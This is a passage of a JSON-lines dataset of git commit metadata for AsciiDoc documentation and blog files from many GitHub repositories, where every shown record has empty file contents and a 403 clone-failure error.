2018-03-30-google-cloud-container-builder-with-docker-mysql.adoc","message":"Update 2018-03-30-google-cloud-container-builder-with-docker-mysql.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-30-google-cloud-container-builder-with-docker-mysql.adoc","new_file":"_posts\/2018-03-30-google-cloud-container-builder-with-docker-mysql.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76c7531dd3c8eee1c169574d3423ae52b70007b0","subject":"Add missing doc for `endpoint local-id`","message":"Add missing doc for `endpoint local-id`\n\nAn adoc manpage file for this command.\n","repos":"globus\/globus-cli,globus\/globus-cli","old_file":"adoc\/endpoint_local_id.1.adoc","new_file":"adoc\/endpoint_local_id.1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/globus\/globus-cli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"41bbe0df2fba772dce3864d72da6d934da2b4db8","subject":"Works on cache doc","message":"Works on cache doc\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/manpage\/tpcache.ini.adoc","new_file":"doc\/manpage\/tpcache.ini.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"d05256a321eb836cba70c9ee18af358fb181c95d","subject":"Fixed wording in Packaging Types (#692)","message":"Fixed wording in Packaging Types (#692)\n\n","repos":"juangon\/wildfly-swarm,juangon\/wildfly-swarm,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm-core,kenfinnigan\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,juangon\/wildfly-swarm,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,nelsongraca\/wildfly-swarm,nelsongraca\/wildfly-swarm,nelsongraca\/wildfly-swarm,nelsongraca\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,kenfinnigan\/wildfly-swarm,nelsongraca\/wildfly-swarm","old_file":"docs\/concepts\/packaging-types.adoc","new_file":"docs\/concepts\/packaging-types.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly-swarm\/wildfly-swarm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5f7d91002ef9b9556446e76b1c0828971cfa5dad","subject":"Update 2015-04-16-Hypothermia-and-sponsors.adoc","message":"Update 2015-04-16-Hypothermia-and-sponsors.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-04-16-Hypothermia-and-sponsors.adoc","new_file":"_posts\/2015-04-16-Hypothermia-and-sponsors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6ee8d56f55610c749b6295598ab43cf7d0f0a52","subject":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","message":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","repos":"shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io","old_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shinchiro\/shinchiro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d663ece7d4770b705e7f7cfdec946935ce6e664","subject":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","message":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8bc1cae8a63e1703332df15c9323c6597b17f862","subject":"Update 2016-09-12-Too-deep-or-not-too-deep.adoc","message":"Update 2016-09-12-Too-deep-or-not-too-deep.adoc","repos":"ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io","old_file":"_posts\/2016-09-12-Too-deep-or-not-too-deep.adoc","new_file":"_posts\/2016-09-12-Too-deep-or-not-too-deep.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ilyaeck\/ilyaeck.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee6cf212b734b5af5726c29555d10b371c0bbbc0","subject":"Update 2015-09-03-Two.adoc","message":"Update 2015-09-03-Two.adoc","repos":"manueljordan\/manueljordan.github.io,manueljordan\/manueljordan.github.io,manueljordan\/manueljordan.github.io","old_file":"_posts\/2015-09-03-Two.adoc","new_file":"_posts\/2015-09-03-Two.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manueljordan\/manueljordan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3969457a4e697e48b823e04e91827b57162f0ae","subject":"y2b create post iPad 2 Review HD","message":"y2b create post iPad 2 Review HD","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-03-16-iPad-2-Review-HD.adoc","new_file":"_posts\/2011-03-16-iPad-2-Review-HD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86052dff17eeb32e5a4b5a5a2aee9207944aa4df","subject":"Update 2015-09-28-A-Byte-of-Python.adoc","message":"Update 2015-09-28-A-Byte-of-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"359c2aac7221263219728a3e899840bf66f22053","subject":"Update 2016-07-04-A-Vicennial-Saga.adoc","message":"Update 2016-07-04-A-Vicennial-Saga.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-04-A-Vicennial-Saga.adoc","new_file":"_posts\/2016-07-04-A-Vicennial-Saga.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94554f316b763e4ebd24dcbadda77a77f86b181c","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e37e69ee6d139b463e694e18bca85fab4c3d003","subject":"Update 2017-03-12-Getting-Started-With-a-NET-Core-Microservice-Using-VS-Code-Docker-on-OSX.adoc","message":"Update 2017-03-12-Getting-Started-With-a-NET-Core-Microservice-Using-VS-Code-Docker-on-OSX.adoc","repos":"dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io","old_file":"_posts\/2017-03-12-Getting-Started-With-a-NET-Core-Microservice-Using-VS-Code-Docker-on-OSX.adoc","new_file":"_posts\/2017-03-12-Getting-Started-With-a-NET-Core-Microservice-Using-VS-Code-Docker-on-OSX.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dannylane\/dannylane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"959887702641ead9e423eab785494873c1d623a2","subject":"Create ISSUE_TEMPLATE.asciidoc","message":"Create ISSUE_TEMPLATE.asciidoc","repos":"browncoat-ninjas\/nimoy,Luftzig\/nimoy","old_file":"ISSUE_TEMPLATE.asciidoc","new_file":"ISSUE_TEMPLATE.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/browncoat-ninjas\/nimoy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"37d104bea3047e5be64c137c88fa5790e6cba6be","subject":"Update 2015-05-16-Faustino-loeza-Perez.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cda465114236dec7740deba30cb17afd6e4c1cd5","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72977edd7efe3f3cb00dad83c77141438fd97b80","subject":"Update 2015-07-16-Luquillo.adoc","message":"Update 2015-07-16-Luquillo.adoc","repos":"2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io","old_file":"_posts\/2015-07-16-Luquillo.adoc","new_file":"_posts\/2015-07-16-Luquillo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2mosquitoes\/2mosquitoes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0a4fefb9b8860acbc4c59fb95cd6239903ad233","subject":"Update 2017-01-07-Merry-Minimalist-Holidays.adoc","message":"Update 2017-01-07-Merry-Minimalist-Holidays.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2017-01-07-Merry-Minimalist-Holidays.adoc","new_file":"_posts\/2017-01-07-Merry-Minimalist-Holidays.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db9f372e22405bb9c0cbae30de778eb88f604305","subject":"Update 2019-06-13-el-Clubo-Ahora-asi-suenan.adoc","message":"Update 2019-06-13-el-Clubo-Ahora-asi-suenan.adoc","repos":"dgrizzla\/dgrizzla.github.io,dgrizzla\/dgrizzla.github.io,dgrizzla\/dgrizzla.github.io,dgrizzla\/dgrizzla.github.io","old_file":"_posts\/2019-06-13-el-Clubo-Ahora-asi-suenan.adoc","new_file":"_posts\/2019-06-13-el-Clubo-Ahora-asi-suenan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dgrizzla\/dgrizzla.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02bf48ba417ed08cbfb59d13aefa28fed20cb2d8","subject":"Add updated navigation to docs pages","message":"Add updated navigation to docs pages\n\nChange-Id: I1faeafcee5a80d52bc6d7959b6c0d85e5ef1d155\nReviewed-on: http:\/\/gerrit.sjc.cloudera.com:8080\/7916\nTested-by: jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b987f34a71a97a75663fcab66d28b08729c38bc6","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67d9d05bba336fee96e565bd4c797fe7cb5a007f","subject":"Update 2015-03-11-Query-parameters-talk-slides.adoc","message":"Update 2015-03-11-Query-parameters-talk-slides.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-03-11-Query-parameters-talk-slides.adoc","new_file":"_posts\/2015-03-11-Query-parameters-talk-slides.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1d80d93ccf91dc4ec75823d66ed21bee94d7758","subject":"resolving conflict","message":"resolving conflict\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"49914c740b3c36c0b9aa8ab283cde93017c6221b","subject":"y2b create post HTC One Unboxing \\u0026 Overview","message":"y2b create post HTC One Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-04-18-HTC-One-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-04-18-HTC-One-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f778bee0c2b2a5529ac5876153d905f40653e340","subject":"Update 2015-08-15-Een-test.adoc","message":"Update 2015-08-15-Een-test.adoc","repos":"PauloMoekotte\/PauloMoekotte.github.io,PauloMoekotte\/PauloMoekotte.github.io,PauloMoekotte\/PauloMoekotte.github.io","old_file":"_posts\/2015-08-15-Een-test.adoc","new_file":"_posts\/2015-08-15-Een-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PauloMoekotte\/PauloMoekotte.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9de89d07da813e0143c1eff44bc03a0dedbe06a3","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ef2c32badeeedcb1729d2b542cf0a823d820d4c","subject":"Update 2016-04-13-Administracion-Remota.adoc","message":"Update 2016-04-13-Administracion-Remota.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-13-Administracion-Remota.adoc","new_file":"_posts\/2016-04-13-Administracion-Remota.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8420374c544aabf3db6367407999d492dc67620","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19cf1bed270dd75711d815b120b83d432b63cf2a","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0207c3b13cdc28594f0722699fa4e630b71ad86d","subject":"added Readme for Dockerfile explanation","message":"added Readme for Dockerfile explanation\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"_dockerPublisher\/ReadMe_automaticPublishing.adoc","new_file":"_dockerPublisher\/ReadMe_automaticPublishing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/droolsjbpm\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"05727e6b8bac55e09980363a048ff72c28aa9917","subject":"add notes on fast prediction of passes","message":"add notes on fast prediction of passes\n","repos":"valpo-sats\/scheduling-bazaar,valpo-sats\/scheduling-bazaar","old_file":"notes\/fast-pass-prediction.adoc","new_file":"notes\/fast-pass-prediction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/valpo-sats\/scheduling-bazaar.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"1a7c02b169496e056f9c34284821a5022ffca7ac","subject":"Describes the all request table from the city employee view.","message":"Describes the all request table from the city employee view.\n","repos":"CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords","old_file":"docs\/table.adoc","new_file":"docs\/table.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CityOfNewYork\/NYCOpenRecords.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c0c3d30472e2424a183329cd430c4b388c421a39","subject":"Add a README for the etc\/ directory..","message":"Add a README for the etc\/ directory..\n","repos":"nanomsg\/nng,nanomsg\/nng,nanomsg\/nng,nanomsg\/nng","old_file":"etc\/README.adoc","new_file":"etc\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nanomsg\/nng.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f26ba5c8c8625f844151d880f34767eeb76f1a2","subject":"Add install from pip documentation","message":"Add install from pip documentation\n","repos":"google\/grr-doc","old_file":"installfrompip.adoc","new_file":"installfrompip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/google\/grr-doc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ccac2ac10ffc1e30dda6d1abe206df03809bce44","subject":"y2b create post Deal Therapy: Pre-order the PS4?","message":"y2b create post Deal Therapy: Pre-order the PS4?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-02-23-Deal-Therapy-Preorder-the-PS4.adoc","new_file":"_posts\/2013-02-23-Deal-Therapy-Preorder-the-PS4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5dcd4d5910ae3aa0fa68e317eb5b26bd1a4d8ae","subject":"y2b create post World's Fastest Portable Drive!","message":"y2b create post World's Fastest Portable Drive!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-06-21-Worlds-Fastest-Portable-Drive.adoc","new_file":"_posts\/2015-06-21-Worlds-Fastest-Portable-Drive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a00e0475f8bb54f2b39b5f21c5b07e5d42e9487","subject":"Update 2017-12-07-Firewall-Docker-with-Iptables.adoc","message":"Update 2017-12-07-Firewall-Docker-with-Iptables.adoc","repos":"kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io","old_file":"_posts\/2017-12-07-Firewall-Docker-with-Iptables.adoc","new_file":"_posts\/2017-12-07-Firewall-Docker-with-Iptables.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kfkelvinng\/kfkelvinng.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1902ea1248b562a1008ab5f69cf7baee946ed7cd","subject":"Update 2016-04-13-Ambientes-de-prueba.adoc","message":"Update 2016-04-13-Ambientes-de-prueba.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-13-Ambientes-de-prueba.adoc","new_file":"_posts\/2016-04-13-Ambientes-de-prueba.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4afbcb0a05774e27f904b23c856ea0d9e9b3a2c2","subject":"Common google app engine Gradle plugin","message":"Common google app engine Gradle plugin\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-googleappengine-gradleplugin.adoc","new_file":"src\/main\/docs\/common-googleappengine-gradleplugin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7b63479cf2f544e81ddec6f3d1c4a4fff9f47222","subject":"Update 2015-12-15-shading.adoc","message":"Update 2015-12-15-shading.adoc","repos":"hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io","old_file":"_posts\/2015-12-15-shading.adoc","new_file":"_posts\/2015-12-15-shading.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hbbalfred\/hbbalfred.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af5ba5e735c05fa570648d3bbd777c31fbdb5b1b","subject":"Update 2017-02-01-Hello-2.adoc","message":"Update 2017-02-01-Hello-2.adoc","repos":"introspectively\/introspectively.github.io,introspectively\/introspectively.github.io,introspectively\/introspectively.github.io,introspectively\/introspectively.github.io","old_file":"_posts\/2017-02-01-Hello-2.adoc","new_file":"_posts\/2017-02-01-Hello-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/introspectively\/introspectively.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7424bf0824f02471fa37976ba04cc4611df80f01","subject":"Update 2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","message":"Update 2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_file":"_posts\/2017-11-24-O-W-A-S-P-Z-A-P-Docker-Hub-A-W-S-E-C-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89dafaae45f3cfdd2148c6b84a94871319ffac61","subject":"Update 2018-03-15-try-ecr.adoc","message":"Update 